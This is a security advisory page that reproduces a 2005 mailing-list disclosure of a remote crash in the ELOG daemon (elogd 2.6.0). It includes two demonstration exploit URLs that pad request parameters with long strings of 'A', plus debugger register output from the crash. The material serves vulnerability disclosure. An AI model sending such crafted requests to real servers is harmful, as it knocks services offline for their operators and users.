SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   ELOG Vendors:   Ritt, Stefan
ELOG elogd Can Be Crashed By Remote Users
SecurityTracker Alert ID:  1015379
SecurityTracker URL:  http://securitytracker.com/id/1015379
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Dec 20 2005
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): 2.6.0
Description:   A vulnerability was reported in ELOG. A remote user can cause the ELOG daemon to crash.

A remote user can send a specially crafted HTTP GET request to cause elogd to crash.

Some demonstration exploit URLs are provided:

http://[target]/:8080/demo/?select=1&mode=AAAAAAAAAAAAAAAAAAAAAAAAAAAAA<lots more>

http://[target]/:8080/demo/?cmd=AAAAAAAAAAAAAAAAAAAAAAAAAAAAA<lots more>

GroundZero Security reported this vulnerability.

Impact:   A remote user can cause elogd to crash.
Solution:   No solution was available at the time of this entry.
Vendor URL:  midas.psi.ch/elog/ (Links to External Site)
Cause:   Exception handling error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] elogd 2.6.0 overflow

Hello,

i thought after all this noise some security related material would be nice
and i just found a bug in elogd on a customer system.

by sending a special crafted request, the daemon will crash.
i didnt test yet if code execution is possible since i just audit
the running daemon on the customer server, sofar i could confirm
a possible DoS. the tested version is: elogd 2.6.0-beta4

A request such as http://www.server.tld/:8080/demo/?select=1&mode=AAAAAAAAAAAAAAAAAAAAAAAAAAAAA<lots more>
or http://www.server.tld/:8080/demo/?cmd=AAAAAAAAAAAAAAAAAAAAAAAAAAAAA<lots more>

results in the following:

Program received signal SIGSEGV, Segmentation fault.
0x080bcb31 in server_loop ()
(gdb) i r
eax            0x8001   32769
ecx            0xbfffe541       -1073748671
edx            0x8001   32769
ebx            0xc0000000       -1073741824
esp            0xbffd8060       0xbffd8060
ebp            0x90f77f0        0x90f77f0
esi            0x90f77f9        152008697
edi            0x90f9226        152015398
eip            0x80bcb31        0x80bcb31
eflags         0x10202  66050
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51


i thought i share my findings right away as this seems perfect to move away from all this
political and troll mails. back to security research :)

regards,

-sk

GroundZero Security Research and Software Development
http://www.groundzero-security.com


pub  1024D/69928CB8 2004-09-27 Stefan Klaas <sk@groundzero-security.com>
sub  2048g/2A3C7800 2004-09-27

Key fingerprint = A93E 41F8 7E82 5F2C 3E76  41F1 4BCF 3096 6992 8CB8

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

mQGiBEFX440RBADGTKOgZR9Y9VA/cfNLWTIN/OmXe9l6UZJ6pY8Hqcv6DFE//Kt9
UfQMU470i+I7SvIHZN066Kl4ts4r90sLxXrE4r5VQCLTsJM68cliatrM8MbbZZs+
xf3ldelZrHNvHkXDk4I/n3O56F9M6tZ/S71AIj++raIbFX57fn8Z8NNOnwCgwDr6
LDVP+5N4DML1/+uvXNtoL30D/A/GUXd6lJ8i7MoZMzwKk1uwDsgWwP+Wm0hMwJMr
fR/di9K55pGdlGFNO5P2L3qOl2BaC8raNkLcXaweW+bao3P66nzpdtmecsjCMWq2
tQWgu/O7S1FgzlUAKJSOc2Th5PY9Raum8bXnSv4gnHZCKjNskIdrz8WDxCzEoPtZ
eCssA/9ydHRvNIPjOTmzjXoE+UbJrB/U//u3dpAsLkzclKeSgjV2eYUgHGcqYn+H
cFoubD78yFWqZqYtxfiyjBlItsIn9ls0gAZFKDFHd1XfOLFSa0/NHNpHLxCZGFIA
tQ0Gp47VRmTPkWJ7lB505w0XioNs1H/1K1RSp++7+t1SNkBlobQpU3RlZmFuIEts
YWFzIDxza0Bncm91bmR6ZXJvLXNlY3VyaXR5LmNvbT6IVwQTEQIAFwUCQVfjjQUL
BwoDBAMVAwIDFgIBAheAAAoJEEvPMJZpkoy4AnYAmwTot1PMUty1YoCuMVg6cpr7
HKy1AJ98jyzD365YkIQAEiihXlQJ4zrxBLkCDQRBV+OvEAgAiu75prsTQZdNijtY
eMQhl4tEL8qi8JOFluYGnvPYjDzU0PY9E4mNx/w2BgYcM3lTVzSmaiLEJ1AzeOHn
w+pLDWsorRZuVI9q3+ExW3s2yFX4ppdHAVBMuYsQyVJRkbobCkcwTbUYXr23pKzh
D8WRAJ991k2lNcQHxMgixAN+55XBFLhwLB0Yz7XmhFYLid5dLxdPllLIV3ZHDeY0
SEqMSpw96+gV0QpX7YH9U2VBr3Wz7Ss6qNZkcgHQw1xmk6Yy24QnT4a9oZD06Yjr
cCocXnyI/YLW1wXo/6Hh44UH3b9mKUX6eh8ybn7QCnZDG7AdxbglLiPTkdcx0YoT
NANZBwADBwf8CrjVKiXSzyhUsdH1es1KQCZ/zH6PvPzdxqYuGuVVMzgaJeeOMS2G
4rLfw2ILahAS0fjng6zX2c1ndPVJ6oAq3IygWsqJH6Uh23NmKTlyx3KtSgyW7YsB
Rn/4wobuojArTHTl+X3U4JZTUEb9E4osB9bFjdsgXcxNSwXghQMh1x5eS5/fcjLd
tACNq0x2/zh8zTJFHK+oNCLY2+iBjTUn7K03rEhQo6HqbPYwyc3LUCwBuFHFDVWp
bZqa4knO0H5BBmbiI09kaVPOs0qRLXCAf1oy9PxK5ZBJ4WfQAnMAU+TuNrTuW2SU
NMh92TCELdDpl/pMDbbBGeJdMvXZmY99HIhGBBgRAgAGBQJBV+OvAAoJEEvPMJZp
koy4p1QAoIaYw3VxA0/mixUsMO4R13sXIL/pAJ9zodR+A9+bLqCRlVusG8JhItv1
Ow==
=E0o1
-----END PGP PUBLIC KEY BLOCK-----

Diese E-Mail kann vertrauliche Informationen enthalten. Wenn Sie nicht der
Sie bitte sofort den Absender und vernichten Sie diese E-Mail.
Das unerlaubte Kopieren sowie die unbefugte Weitergabe dieser E-Mail oder von
Teilen dieser E-Mail ist nicht gestattet.

This E-mail might contain confidential information. If you are not the right addressee
or you have recived this Mail in error, please inform the Sender as soon as possible
and delete this E-Mail immediately. You are not allowed to make any copies or
relay this E-Mail.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC